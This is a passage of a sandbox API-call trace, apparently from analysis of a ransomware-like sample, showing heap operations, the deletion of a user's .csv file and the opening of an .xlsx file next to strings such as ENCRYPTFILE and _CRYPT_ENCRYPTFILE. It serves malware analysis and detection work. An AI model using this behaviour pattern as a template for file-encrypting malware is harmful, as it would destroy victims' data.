lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.878] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.878] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.878] FreeLibrary (hLibModule=0x756e0000) returned 1 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0081.879] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0081.879] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.879] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.879] CloseHandle (hObject=0x298) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0081.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0081.880] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0081.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.880] CloseHandle (hObject=0x258) returned 1 [0081.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0081.887] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\hhInqxZ8uBmIDhBj07.csv", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\hhInqxZ8uBmIDhBj07.csv", lpFilePart=0x0) returned 0x47 [0081.887] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\hhInqxZ8uBmIDhBj07.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\hhinqxz8ubmidhbj07.csv")) returned 0x20 [0081.887] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\hhInqxZ8uBmIDhBj07.csv", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6080750, ftCreationTime.dwHighDateTime=0x1d5ed25, ftLastAccessTime.dwLowDateTime=0x6f5c28c0, ftLastAccessTime.dwHighDateTime=0x1d5ec05, ftLastWriteTime.dwLowDateTime=0x6f5c28c0, ftLastWriteTime.dwHighDateTime=0x1d5ec05, nFileSizeHigh=0x0, nFileSizeLow=0x16ee0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="hhInqxZ8uBmIDhBj07.csv", cAlternateFileName="HHINQX~1.CSV")) returned 0x41ac440 [0081.887] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\hhInqxZ8uBmIDhBj07.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\hhinqxz8ubmidhbj07.csv")) returned 1 [0081.925] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6080750, ftCreationTime.dwHighDateTime=0x1d5ed25, ftLastAccessTime.dwLowDateTime=0x6f5c28c0, ftLastAccessTime.dwHighDateTime=0x1d5ec05, ftLastWriteTime.dwLowDateTime=0x6f5c28c0, ftLastWriteTime.dwHighDateTime=0x1d5ec05, nFileSizeHigh=0x0, nFileSizeLow=0x16ee0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="hhInqxZ8uBmIDhBj07.csv", cAlternateFileName="HHINQX~1.CSV")) returned 0 [0081.926] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0081.926] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0081.926] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\lWEK-JelBvY6EHJ.xlsx", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf795b670, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0xe75f1d20, ftLastAccessTime.dwHighDateTime=0x1d5f05e, ftLastWriteTime.dwLowDateTime=0xe75f1d20, ftLastWriteTime.dwHighDateTime=0x1d5f05e, nFileSizeHigh=0x0, nFileSizeLow=0x6285, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="lWEK-JelBvY6EHJ.xlsx", cAlternateFileName="LWEK-J~1.XLS")) returned 0x41ac440 [0081.926] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0081.927] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0081.927] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0081.927] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0081.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cb288, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0081.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0081.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0081.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0081.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0081.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0081.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0081.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0081.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0081.928] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\lWEK-JelBvY6EHJ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\lwek-jelbvy6ehj.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0081.928] FreeLibrary (hLibModule=0x772d0000) returned 1 [0081.928] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0081.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cada8 [0081.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cada8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0081.929] CloseHandle (hObject=0x258) returned 1 [0081.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0081.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0081.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0081.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0081.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0081.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0081.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0081.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0081.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0081.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0081.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0081.929] FreeLibrary (hLibModule=0x772d0000) returned 1 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0081.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0081.930] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0081.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0081.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0081.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0081.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0081.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0081.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0081.931] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0081.931] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0081.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0081.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28e0 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0081.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8430 [0081.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0081.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0081.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0081.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2870 [0081.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0081.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2760 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0081.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0081.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0081.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, 